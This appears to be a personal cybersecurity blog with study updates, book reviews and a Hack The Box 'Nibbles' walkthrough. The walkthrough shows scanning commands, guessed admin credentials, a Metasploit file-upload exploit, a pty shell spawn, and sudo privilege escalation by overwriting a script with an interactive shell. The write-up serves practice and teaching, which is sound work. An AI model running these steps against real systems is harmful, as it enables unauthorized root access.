Am I picking this back up?

I feel like Moana – you know how the water called to her?  Well, this may sound a little nerdy, but my OSCP journey still calls to me.  It’s hard, like really hard.  Mad props to all those who are flaunting their OSCP on LinkedIn – I am going to get there, but it’s been some time, and I need to refresh, not cheat through walkthroughs, and just focus.  After some deliberation, I took a look at this comment from /u/Howl50vride and ultimately decided on The Cyber Mentor’s Practical Ethical Hacking Course to get back into it.


I think the course is a great place to take few steps back and just refresh.  From there, I think I am going to pursue my eCPPT and then onto the OSCP again.  I think a lot about my role now in cybersecurity, and I have decided that this will help it.  It’s not perfectly aligned, but that’s ok.   Who knows what the future will hold.  I should follow my passion and see where the world takes me.

Robin Sharma’s Books to the World

Robin Sharma’s books are great.  Here is what I have read from him so far:

  • Family Wisdom from the Monk Who Sold His Ferrari
  • The 5 AM Club: Own Your Morning. Elevate Your Life
  • The Secret Letters Of The Monk Who Sold His Ferrari

I am currently working on the The Everyday Hero Manifesto.  The one that has changed my routine at least on a daily basis is the 5 AM club.  This new book, The Everyday Hero Manifesto is powerful, and hard to put down.  It’s full of great wisdom on how to lead a successful life on your terms and I highly recommend it.  The main theme in it that I am finding so far is how to be a great person, and how to respect, honor, and appreciate the world we live in.  It’s a beautiful manifesto to live by.

I am an eJPT. Woot.

I started the test on Friday, and just finished up this morning with a 93.5% passing rate.  I am totally glad I decided to chunk this milestone into my Pen Testing journey!

 

Next, I think I am going to take some time to learn Git.  I have this book, Pro Git, that I will go through a bit.  It would be cool to develop some simple pen test tools and at minimum, understand Git.  Then, back into PenTesting.

Countdown to eJPT

10 days till I take the eJPT and I feel pretty confident about it.  I have done the three black boxes at the end of the course and they were a bit tricky, I feel like I have the fundamentals down after studying for the OSCP first.   With the kids at home, work taking priority (gotta put food on the table) and other various things (running, reading, meditating, living life), I am finally at the point where I just need to take the test.  I have heard to not over think it.  I am not sure if I will go back to the OSCP (eCPPT, maybe?), or move on to more relevant certs in my current career path or not.  Either case, I really, really like pen testing and it is really fun.  I am currently pulling through wreath at Try Hack Me and having a blast.

Turn your clocks forward!

Hell World –

Daylight savings begins today, which means it’s spring and the weather is getting much warmer.  I took a bike ride with my son yesterday, and fell back in love with living in the city.  I think a lot of people are – well, actually everyone, is pretty tired of being cooped up due to COVID.  It was nice to see people out and about outside, but a bit cautious because we aren’t all vaccinated yet.

I joined an ISACA book club, and read “Hackable” by Ted Harrington.  

It was a pretty easy read, but did highlight issues with application security – specifically black-box testing and app scanning.  Basically, just scanning for vulnerabilities is not enough.  You have to do application security testing.  Also, never do a black-box test.  You won’t get enough information, so white-box testing is the way to go.  Overall, a good read, and I recommend it if you are looking for something light to read.

On another note, I am picking back up PTSv4.  I don’t know why I haven’t gone for my eJPT yet.  I think if I can get some more solid studying in – basically finish the black boxes, I will give it a go.  Pen testing has been such a journey for me, but having the time to do it has been hard when the kids are up and about.  I’ll get there!

 

Traverxec on HTB!

Yay!  I got another easy active box.  I am learning a lot about certain services and some privilege escalation.  It’s fun.  I am officially a script kiddie on hack the box.  haha

Well, back to work.

Hack The Box :: Nibbles Walk-through

Priv esc through me for a loop on this one

This is a small win for me. It’s a retired box so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that out of all the walk-throughs, none of the privesc could be replicated. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, that this might be a crumb for you to push through.

First, I ran nmap on the target. I chose to be verbose on everything as my connection to the web is pretty poor at the moment.

nmap -sC -sV -oA initial -vvv 10.10.10.75
port 80 and 22

Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.

Looking at the code, I found /nibbleblog/ as a path in the URL

Let’s go there.

So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
…go go gobuster!

Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.

Here is where there is an enumeration jump. If you go back to the blog, you will see a link for the atom feed: http://10.10.10.75/nibbleblog/feed.php. The title is nibbles. Also, looking at http://10.10.10.75/nibbleblog/content/private/users.xml shows admin as a user. So yah, play with that and you get the following:

Username: admin
Password: nibbles

I started looking for exploits at this point, and it looks like the best one requires metasploit: https://www.exploit-db.com/exploits/38489. So let’s do it.

root@kali:~# msfconsole

------SNIP--------

       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Let’s use that module.

msf5 > use exploit/multi/http/nibbleblog_file_upload 

Set all the required options:

and send.

damn it feels good to get meterpreter…

drop into shell…

meterpreter > shell
Process 2902 created.
Channel 0 created.
id 
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image

Let’s spawn a TTY shell using the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Let’s go ahead and get the user.txt flag!

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
<ml/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt

Now, Privesc. This was the hardest thing and took me a while to get it down. But finally, this article did me good, and I was able to work it out. One of the first things is figure out is if you have any files that you can invoke as root. So you do that by calling the command:

sudo -l

so we can run /home/nibbler/personal/stuff/monitor.sh as root. Going into /home/nibbler, you are going to want to unzip personal.zip to get that monitor.sh file. Now we need to modify the monitor.sh file to have the following code:

#!/bin/bash
/bin/bash -i

You can do this by either forwarding it to the end of the text file, or uploading the file using netcat and overwrite it, or get back to meterpreter and upload the file. Make sure you make the file executable (chmod +x monitor.sh)

Then just run the following command:

nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
I am root!

And there we go. Now to get the flag…

cat /root/root.txt

I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!